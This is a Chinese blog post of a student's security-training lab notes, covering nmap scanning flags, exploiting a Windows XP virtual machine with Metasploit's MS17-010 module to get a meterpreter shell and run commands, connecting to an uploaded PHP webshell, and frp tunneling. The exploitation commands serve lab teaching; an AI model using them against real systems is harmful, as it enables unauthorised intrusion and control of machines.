实训第九天

博主： Xherlock
发布时间：2022 年 07 月 23 日
290 次浏览
暂无评论
2211字数
分类：实训

实训第九天

端口扫描

nmap使用学习

扫描主机：【-sn：不扫描端口，只ping主机】【通过ICMP echo判定主机是否存活】

端口扫描：【-sS：TCP SYN扫描，可以查看端口开放情况】【-PO：使用ICMP协议进行ping】

扫描指定端口：

系统探测：【-sV：检测系统版本】【-O：尝试识别远程操作系统】【-V：详细输出扫描情况】【-A：同时打开操作系统指纹和版本检测】

## 远程管理

msf 关闭litexp的防火墙
kali中打开msf： msfconsole
在nmap发现了windows xp的虚拟机后，查找ms17_010的攻击载荷准备攻击
search 17_010
在搜索结果中选择4：use 4
设置攻击目标(litexp)： set rhost 192.168.x.x
开始攻击：run
获取meterpreter后，执行shell（中文系统部分乱码）
执行系统命令，管理服务器（彻底控制虚拟机）
如ipconfig、shutdown -s -t 10 -c "10秒内关机！"

反弹shell

kali连接winXP（利用之前upload上传的shell.php脚本从蚁剑连接）

kali连接ubuntu22.0.4

frp

借用公网frps流量转发服务，通过公网域名和端口，访问虚拟机内部网站，实现内网穿透。

按照老师发的服务器信息和自己想要映射的ip端口配置frpc.ini即可，访问自己的端口如下（开了本机的phpstudy）

burp攻击反制

建议使用高版本的 burp

最后修改：2022 年 07 月 23 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

Win11新机鼓捣记录
浏览次数: 1830
C++学习
浏览次数: 1160
栈~数制转换
浏览次数: 1130
Python实现文件管理系统（重命名和删除）
浏览次数: 1105
汇编语言学习（一）~基础知识
浏览次数: 1077

顶点软件
你写得非常清晰明了，让我很容易理解你的观点。
mars
博主你好，请问怎么知道的alloc函数属于Buffer下的方法...
lj
该评论仅登录用户及评论双方可见
Mr.Guan
:@(赞一个)
Typecho
欢迎加入 Typecho 大家族

数据结构与算法~查找
浏览次数: 446
数据结构和算法思维导图
浏览次数: 444
数据库学习（二）
浏览次数: 606
数据库系统开发生命周期
浏览次数: 765
CH0 恶意代码
浏览次数: 278

实训第九天

Xherlock • 2022 年 07 月 23 日

<h1>实训第九天</h1><ol><li>端口扫描</li></ol><p><img src="http://xherlock.top/usr/uploads/2022/07/3055637390.png" alt="image-20220720092914489.png" title="image-20220720092914489.png"style=""></p><ol><li>nmap使用学习</li></ol><p><strong>扫描主机</strong>：【-sn：不扫描端口，只ping主机】【通过ICMP echo判定主机是否存活】</p><p><img src="http://xherlock.top/usr/uploads/2022/07/3651286037.png" alt="image-20220720094900481.png" title="image-20220720094900481.png"style=""></p><p><strong>端口扫描</strong>：【-sS：TCP SYN扫描，可以查看端口开放情况】【-PO：使用ICMP协议进行ping】</p><p><img src="http://xherlock.top/usr/uploads/2022/07/1699658031.png" alt="image-20220720095511836.png" title="image-20220720095511836.png"style=""></p><p>扫描指定端口：</p><p><img src="http://xherlock.top/usr/uploads/2022/07/2821829263.png" alt="image-20220720095630511.png" title="image-20220720095630511.png"style=""></p><p><strong>系统探测</strong>：【-sV：检测系统版本】【-O：尝试识别远程操作系统】【-V：详细输出扫描情况】【-A：同时打开操作系统指纹和版本检测】</p><p><img src="http://xherlock.top/usr/uploads/2022/07/75124132.png" alt="image-20220720102327551.png" title="image-20220720102327551.png"style=""></p><p>## 远程管理</p><ol><li>msf 关闭litexp的防火墙</li><li>kali中打开msf： msfconsole</p><p><img src="http://xherlock.top/usr/uploads/2022/07/3809547317.png" alt="image-20220720101539820.png" title="image-20220720101539820.png"style=""></li><li>在nmap发现了windows xp的虚拟机后，查找ms17_010的攻击载荷准备攻击<br>search 17_010</p><p><img src="http://xherlock.top/usr/uploads/2022/07/4078265557.png" alt="image-20220720101600190.png" title="image-20220720101600190.png"style=""></li><li>在搜索结果中选择4：use 4</li><li>设置攻击目标(litexp)： set rhost 192.168.x.x</li><li>开始攻击：run</p><p><img src="http://xherlock.top/usr/uploads/2022/07/1905361634.png" alt="image-20220720101731959.png" title="image-20220720101731959.png"style=""></li><li>获取meterpreter后，执行shell（中文系统部分乱码）</p><p><img src="http://xherlock.top/usr/uploads/2022/07/3190243359.png" alt="image-20220720101758054.png" title="image-20220720101758054.png"style=""></li><li>执行系统命令，管理服务器（彻底控制虚拟机）</p><p>如ipconfig、shutdown -s -t 10 -c "10秒内关机！"</p><p><img src="http://xherlock.top/usr/uploads/2022/07/1868033348.png" alt="image-20220720101828031.png" title="image-20220720101828031.png"style=""></li></ol><h2>反弹shell</h2><p>kali连接winXP（利用之前upload上传的shell.php脚本从蚁剑连接）</p><p><img src="http://xherlock.top/usr/uploads/2022/07/434648987.png" alt="image-20220720140703043.png" title="image-20220720140703043.png"style=""></p><p>kali连接ubuntu22.0.4</p><p><img src="http://xherlock.top/usr/uploads/2022/07/2492150227.png" alt="image-20220720141122542.png" title="image-20220720141122542.png"style=""></p><h2>frp</h2><p>借用公网frps流量转发服务，通过公网域名和端口，访问虚拟机内部网站，实现内网穿透。</p><p>按照老师发的服务器信息和自己想要映射的ip端口配置frpc.ini即可，访问自己的端口如下（开了本机的phpstudy）</p><p><img src="http://xherlock.top/usr/uploads/2022/07/3753633075.png" alt="image-20220720162256186.png" title="image-20220720162256186.png"style=""></p><h2>burp攻击反制</h2><p><img src="http://xherlock.top/usr/uploads/2022/07/627909779.png" alt="image-20220720173024174.png" title="image-20220720173024174.png"style=""></p><p><img src="http://xherlock.top/usr/uploads/2022/07/1575684879.png" alt="image-20220720173021089.png" title="image-20220720173021089.png"style=""></p><p>建议使用高版本的 burp</p>